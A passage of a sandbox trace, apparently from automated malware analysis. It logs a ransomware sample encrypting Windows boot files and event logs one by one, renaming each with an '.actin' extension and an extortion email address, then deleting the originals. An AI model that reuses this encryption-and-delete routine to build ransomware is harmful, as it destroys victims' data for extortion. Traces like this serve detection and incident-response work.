"c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.602] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=63832) returned 1 [0059.602] CloseHandle (hObject=0x300) returned 1 [0059.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui")) returned 0x20 [0059.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.602] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.602] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.603] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.603] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=42328) returned 1 [0059.603] CloseHandle (hObject=0x300) returned 1 [0059.603] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui")) returned 0x20 [0059.603] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.603] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.603] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.603] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.603] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=63840) returned 1 [0059.603] CloseHandle (hObject=0x300) returned 1 [0059.603] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui")) returned 0x20 [0059.603] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.603] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.604] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.604] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.604] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=42392) returned 1 [0059.604] CloseHandle (hObject=0x300) returned 1 [0059.604] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui")) returned 0x20 [0059.604] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.604] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.604] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.604] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.605] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=395226) returned 1 [0059.605] CloseHandle (hObject=0x300) returned 1 [0059.605] GetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr")) returned 0x27 [0059.605] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x26) returned 0 [0059.605] GetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\bootmgr.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.605] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.605] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x27) returned 0 [0059.606] SetEvent (hEvent=0x2e8) returned 1 [0059.606] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.606] CreateFileW (lpFileName="\\\\?\\C:\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.607] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=1) returned 1 [0059.607] CloseHandle (hObject=0x300) returned 1 [0059.607] GetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTNXT" (normalized: "c:\\bootnxt")) returned 0x26 [0059.607] GetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTNXT.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\bootnxt.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.607] CreateFileW (lpFileName="\\\\?\\C:\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.607] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0059.608] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0059.608] CreateFileW (lpFileName="\\\\?\\C:\\BOOTNXT.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\bootnxt.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0059.608] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71b00) returned 1 [0059.608] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0059.608] ReadFile (in: hFile=0x300, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x1, lpOverlapped=0x0) returned 1 [0059.609] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x10, dwBufLen=0x10 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x10) returned 1 [0059.609] WriteFile (in: hFile=0x330, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x10, lpOverlapped=0x0) returned 1 [0059.610] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71e80) returned 1 [0059.610] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0059.610] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x30, dwBufLen=0x30 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x30) returned 1 [0059.610] CryptDestroyKey (hKey=0xf71e80) returned 1 [0059.610] WriteFile (in: hFile=0x330, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xe2, lpOverlapped=0x0) returned 1 [0059.610] CryptDestroyKey (hKey=0xf71b00) returned 1 [0059.610] CloseHandle (hObject=0x300) returned 1 [0059.610] CloseHandle (hObject=0x330) returned 1 [0059.611] DeleteFileW (lpFileName="\\\\?\\C:\\BOOTNXT" (normalized: "c:\\bootnxt")) returned 1 [0059.612] SetEvent (hEvent=0x2e8) returned 1 [0059.612] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.612] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0059.612] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=8192) returned 1 [0059.612] CloseHandle (hObject=0x330) returned 1 [0059.612] GetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 0x27 [0059.612] SetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0059.613] GetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\bootsect.bak.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.613] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0059.613] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0059.613] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0059.613] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\bootsect.bak.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.613] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72040) returned 1 [0059.613] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0059.613] ReadFile (in: hFile=0x330, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x2000, lpOverlapped=0x0) returned 1 [0059.617] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x2010, dwBufLen=0x2010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x2010) returned 1 [0059.617] WriteFile (in: hFile=0x300, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x2010, lpOverlapped=0x0) returned 1 [0059.618] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71e80) returned 1 [0059.618] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0059.618] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0059.618] CryptDestroyKey (hKey=0xf71e80) returned 1 [0059.618] WriteFile (in: hFile=0x300, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0059.618] CryptDestroyKey (hKey=0xf72040) returned 1 [0059.618] CloseHandle (hObject=0x330) returned 1 [0059.618] CloseHandle (hObject=0x300) returned 1 [0059.619] DeleteFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 1 [0059.620] SetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK.id[B4197730-0115].[fileisafe@tuta.io].actin", dwFileAttributes=0x27) returned 1 [0059.620] SetEvent (hEvent=0x2e8) returned 1 [0059.620] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.620] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.620] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.620] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0060.120] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0060.120] CloseHandle (hObject=0x330) returned 1 [0060.174] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx")) returned 0x20 [0060.174] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Application.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\application.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0060.174] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0060.174] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0060.174] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0060.174] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Application.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\application.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0060.174] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71f40) returned 1 [0060.174] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0060.174] ReadFile (in: hFile=0x330, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0060.176] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0060.176] WriteFile (in: hFile=0x328, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0060.178] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b00) returned 1 [0060.178] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0060.178] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0060.178] CryptDestroyKey (hKey=0xf71b00) returned 1 [0060.178] WriteFile (in: hFile=0x328, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0060.179] CryptDestroyKey (hKey=0xf71f40) returned 1 [0060.179] CloseHandle (hObject=0x330) returned 1 [0060.179] CloseHandle (hObject=0x328) returned 1 [0060.180] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx")) returned 1 [0060.182] SetEvent (hEvent=0x2e8) returned 1 [0060.182] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0060.182] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0060.184] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0060.184] CloseHandle (hObject=0x328) returned 1 [0060.184] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx")) returned 0x20 [0060.184] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0060.184] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0060.184] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0060.184] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0060.184] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0060.185] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71f80) returned 1 [0060.185] CryptSetKeyParam (hKey=0xf71f80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0060.185] ReadFile (in: hFile=0x328, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0060.187] CryptEncrypt (in: hKey=0xf71f80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0060.187] WriteFile (in: hFile=0x330, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0060.189] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71fc0) returned 1 [0060.189] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0060.189] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xc0, dwBufLen=0xc0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xc0) returned 1 [0060.189] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0060.189] WriteFile (in: hFile=0x330, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x172, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x172, lpOverlapped=0x0) returned 1 [0060.189] CryptDestroyKey (hKey=0xf71f80) returned 1 [0060.189] CloseHandle (hObject=0x328) returned 1 [0060.189] CloseHandle (hObject=0x330) returned 1 [0060.191] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx")) returned 1 [0060.192] SetEvent (hEvent=0x2e8) returned 1 [0060.192] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0060.192] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0060.194] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=1052672) returned 1 [0060.194] CloseHandle (hObject=0x330) returned 1 [0060.194] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx")) returned 0x20 [0060.194] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0060.194] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0060.194] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0060.194] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0060.194] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 